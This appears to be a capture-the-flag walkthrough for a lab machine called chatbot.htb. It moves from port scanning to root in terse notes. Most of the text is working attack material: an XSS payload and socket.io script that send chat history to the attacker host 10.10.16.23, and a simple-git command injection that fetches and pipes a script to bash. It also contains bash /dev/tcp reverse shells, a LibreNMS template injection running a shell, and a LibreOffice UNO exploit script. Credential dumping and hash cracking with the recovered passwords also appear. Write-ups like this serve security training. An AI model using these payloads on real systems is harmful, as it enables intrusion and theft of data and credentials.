PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 5f:b2:cd:54:e4:47:d1:0e:9e:81:35:92:3c:d6:a3:cb (ECDSA) |_ 256 b9:f0:0d:dc:05:7b:fa:fb:91:e6:d0:b4:59:e6:db:88 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) | http-title: Site doesn't have a title (text/html; charset=UTF-8). |_Requested resource was /static/index.html |_http-cors: GET POST |_http-server-header: nginx/1.18.0 (Ubuntu) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
register a account
ivan@gmail.com:123456
type
help
Try if there is any secondary SQL injection in register page?
no , every syntax is being filtered exclude `@`
By base64 decode, i found this info in Cookie
Cookie: authorization=Bearer%20{"alg":"HS256","typ":"JWT"}.{"userID":"65effe4fa686df483ce47da7","iat":1710227146}.McTjCzxd8w26XRWH18qDyahlUpgqI-ZA1EAA_NI-KZM
we can see hash algorithm is HS256
Test if there is XSS existed . Seemly, <script> is being filtered.
Try the other way
php -S 0.0.0.0:80
<img SRC=p onerror="var script1 = document.createElement('script'); script1.src='http://10.10.16.23/test.js';document.head.appendChild(script1);" />
it does work
in chatbox, i can see it’s socket.io. And we can track the history.
socket.io.js
:write
test.js
as a listener.const script = document.createElement('script'); script.src = '/socket.io/socket.io.js'; document.head.appendChild(script); script.addEventListener('load', function() { const res = axios.get(`/user/api/chat`); const socket = io('/',{withCredentials: true}); socket.on('message', (my_message) => {fetch("http://10.10.16.23:8000/?d=" + btoa(my_message))}) ; socket.emit('client_message', 'history'); });
php -S 0.0.0.0:8080 php -S 0.0.0.0:80
Send to “Contact_us” again:
History context received.(base64 encoded format)
V3JpdGUgYSBzY3JpcHQgZm9yICBkZXYtZ2l0LWF1dG8tdXBkYXRlLmNoYXRib3QuaHRiIHRvIHdvcmsgcHJvcGVybHk=
Retrieved subdomain
dev-git-auto-update.chatbot.htb
echo "10.129.237.125 dev-git-auto-update.chatbot.htb" >>/etc/hosts
Found this page, showing up
simple-git v3.14
Searching on google
ext::sh -c bash -i >& /dev/tcp/10.10.16.23/6666 0>&1
Not works.
Create
rev.sh
#!/bin/bash bash -c "bash -i >& /dev/tcp/10.10.16.23/6666 0>&1"
php -S 0.0.0.0:8000
ext::sh -c curl% http://10.10.16.23:8000/rev.sh|bash >&2
Connect to the reverse shell
File enumeration under
/var
There is mongodb exists
show dbs use testing show collections
There are two collections under
testing
dbs. List all users infodb.users.find()
{ "_id" : ObjectId("648874de313b8717284f457c"), "name" : "admin", "email" : "admin@chatbot.htb", "password" : "$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.", "terms" : true, "value" : true, "authorization_token" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySUQiOiI2NDg4NzRkZTMxM2I4NzE3Mjg0ZjQ1N2MiLCJpYXQiOjE3MTAyOTE2NTF9.LSLn0klkH_MWk5-iMr2fPjDzcklg6sSrg-037lP6iIY", "__v" : 0 } { "_id" : ObjectId("648874de313b8717284f457d"), "name" : "frank_dorky", "email" : "frank_dorky@chatbot.htb", "password" : "$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6", "terms" : true, "value" : true, "authorization_token" : " ", "__v" : 0 }
Two hashes found. Then try to recover them by hashcat
admin:$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC. frank_dorky:$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6
hash cracking
hashcat -m 3200 hashes /usr/share/wordlists/rockyou.txt --username
The credential i get:
frank_dorky:manchesterunited
ssh frank_dorky@10.129.237.125
Get the initial access!
frank_dorky has no
sudo
let me run linpeas
here is being hilighted as
/usr/bin/python3.10 cap_net_raw=eip
But it is actually irrelavent
See some ports that are not normal, try port forwarding
ssh -L 3001:127.0.0.1:3000 frank_dorky@10.129.237.125
LibreNMS
google, but no PE exploitation available found
No access permission
Found an article about bypassing the permission limitation for LibreNMS
./adduser.php test test 10
login with
test:test
, we can see there error prompt.See debugging
and here i need changing the forwarding port from 3001 to 3000, here i switch to kali linux
echo "127.0.0.1 librenms.com" >> /etc/hosts
ssh -L 3000:127.0.0.1:3000 frank_dorky@10.129.237.125
Then enumerate the apps, i found
templates
Reading this article:
@php system("bash -c 'bash -i >& /dev/tcp/10.10.16.23/6666 0>&1'");@endphp
write a reverse shell into template, and execute automatically.
Get a shell as user librenms
check environment variable
env
password found :
mychemicalformulaX
Then, try this password with user
kai_relay
ssh kai_relay@10.129.237.125
kai_relay owns
sudo
privilege to file /usr/bin/office.sh
#!/bin/bash /usr/bin/soffice --calc --accept="socket,host=localhost,port=2002;urp;" --norestore --nologo --nodefault --headless
The script seems used to start Openoffice calculator on port 2002
search on google for exploitation
import uno from com.sun.star.system import XSystemShellExecute import argparse parser = argparse.ArgumentParser() parser.add_argument('--host', help='host to connect to', dest='host', required=True) parser.add_argument('--port', help='port to connect to', dest='port', required=True) args = parser.parse_args() # Define the UNO component localContext = uno.getComponentContext() # Define the resolver to use, this is used to connect with the API resolver = localContext.ServiceManager.createInstanceWithContext( "com.sun.star.bridge.UnoUrlResolver", localContext ) # Connect with the provided host on the provided target port print("[+] Connecting to target...") context = resolver.resolve( "uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port)) # Issue the service manager to spawn the SystemShellExecute module and execute calc.exe service_manager = context.ServiceManager print("[+] Connected to {0}".format(args.host)) shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute") shell_execute.execute("cat", '/root/root.txt',1)
sudo /usr/bin/office.sh python3 exp.py --host 127.0.0.1 --port 2002
get the root flag!